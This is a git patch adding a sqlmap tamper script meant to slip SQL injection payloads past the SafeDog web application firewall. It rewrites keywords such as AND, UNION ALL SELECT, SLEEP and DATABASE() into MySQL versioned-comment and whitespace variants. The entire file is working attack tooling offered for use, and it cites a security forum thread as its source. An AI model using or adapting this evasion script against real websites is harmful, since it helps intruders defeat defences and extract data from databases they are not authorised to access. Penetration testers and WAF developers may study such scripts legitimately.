From 6cd3e117be732a928e98adf0dc5b885d3974d91d Mon Sep 17 00:00:00 2001
From: Mrxn <mrxn.net@gmail.com>
Date: Sun, 20 Dec 2020 20:40:55 +0800
Subject: [PATCH] =?UTF-8?q?add=20sqlmap=5Fbypass=5F=E5=AE=89=E5=85=A8?=
 =?UTF-8?q?=E7=8B=972=5Ftamper.py?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 tools/sqlmap_bypass_安全狗2_tamper.py | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100755 tools/sqlmap_bypass_安全狗2_tamper.py

diff --git a/tools/sqlmap_bypass_安全狗2_tamper.py b/tools/sqlmap_bypass_安全狗2_tamper.py
new file mode 100755
index 0000000..6723376
--- /dev/null
+++ b/tools/sqlmap_bypass_安全狗2_tamper.py
@@ -0,0 +1,20 @@
+# coding=UTF-8 
+# Desc: sqlmap_bypass_安全狗2_tamper
+# from: https://www.t00ls.net/thread-58882-1-1.html
+
+from lib.core.enums import PRIORITY
+__priority__ = PRIORITY.LOW
+
+def tamper(payload, **kwargs):
+    payload=payload.replace('AND','/*!29440AND*/')
+    payload=payload.replace('ORDER','/*!29440order*/')
+    payload=payload.replace('LIKE USER()','like (user/**/())')
+    payload=payload.replace('DATABASE()','database/*!29440*/()')
+    payload=payload.replace('CURRENT_USER()','CURRENT_USER/**/()')
+    payload=payload.replace('SESSION_USER()','SESSION_USER(%0a)')
+    payload=payload.replace('UNION ALL SELECT','union/*!29440select*/')
+    payload=payload.replace('super_priv','/*!29440/**/super_priv*/')
+    payload=payload.replace('and host=','/*!29440and*/host/*!11440=*/')
+    payload=payload.replace('BENCHMARK(','BENCHMARK/*!29440*/(')
+    payload=payload.replace('SLEEP(','sleep/**/(')
+    return payload
\ No newline at end of file